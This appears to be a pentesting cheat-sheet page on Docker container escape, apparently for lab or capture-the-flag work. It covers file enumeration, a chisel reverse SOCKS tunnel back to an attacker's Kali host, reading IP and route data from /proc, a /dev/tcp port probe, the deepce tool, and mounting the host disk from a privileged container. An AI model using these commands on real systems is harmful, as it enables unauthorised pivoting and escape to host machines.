Docker Container Escape

Looking For Potential Files

Whenever you are in a docker container, always try to enumerate the system as much as you can, because you will always find something interesting in it.

// Potential Directories where you can find something interesting

/opt
/home
/home/<username>
/tmp
/var/www/html

Doing Reverse Proxy Using Chisel

We can also do reverse proxy using chisel. It will help us in such a way that you want to connect to MySQL or Redis database and you are not having such tools installed on the docker container so you can do a reverse proxy and connect to MySQL or redis using proxychains

//Running Chisel on the Kali Linux First

chisel server --reverse -p 1234 --socks5


// Running Chisel on the docker container

./chisel client <ip of kali linux>:1234 R:socks

// Now you can use proxychains and access the things on docker container

Looking For IP Addresses

Sometimes you cannot run ip a or ifconfig command so you can run the following to obtain the ip address 

cat /proc/net/fib_trie // this sometimes shows the ip addresses of different services

Route Information

We can look for routes using below command

cat /proc/net/route

to convert the hexadecimal ip we can use below python script

import sys

def hex_to_ip(hex_str):
    # Split the hex string into 4 chunks of 2 characters (octets)
    octets = [hex_str[i:i+2] for i in range(0, len(hex_str), 2)]
    
    # Reverse the order of octets for little-endian format
    octets.reverse()
    
    # Convert each octet from hex to decimal
    ip_octets = [str(int(octet, 16)) for octet in octets]
    
    # Join the decimal octets with dots to form an IP address
    ip_address = ".".join(ip_octets)
    
    return ip_address

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python hex_to_ip.py <hex_value>")
        sys.exit(1)
    
    hex_value = sys.argv[1]
    
    if len(hex_value) != 8:
        print("Error: The hex value should be 8 characters long.")
        sys.exit(1)
    
    ip = hex_to_ip(hex_value)
    print(f"Converted IP: {ip}")

Command To See Open Port

if you want to see an open port and there is no Nmap or Netcat, you can run the below command

cat < /dev/tcp/172.18.0.1/3306

Automated Tools

Deepce

We can use Deepce tool from the below link to enumerate docker containers for potential escapes

LogoGitHub - stealthcopter/deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)GitHub
bash deepce.sh

Docker Privileged Mode Enabled

We can escalate our privileges from docker container to host machine if we have privilege mode turned on, in this case we can mount the Host Files and Folders on the Docker Container and access them

 mkdir /mnt/host
 mount /dev/xvda1 /mnt/host/
 cd /mnt/host/
# now you can see the Host OS Files and Folders

PreviousGetting a Fully Interactive TTY ShellNextTunneling and Pivoting

Last updated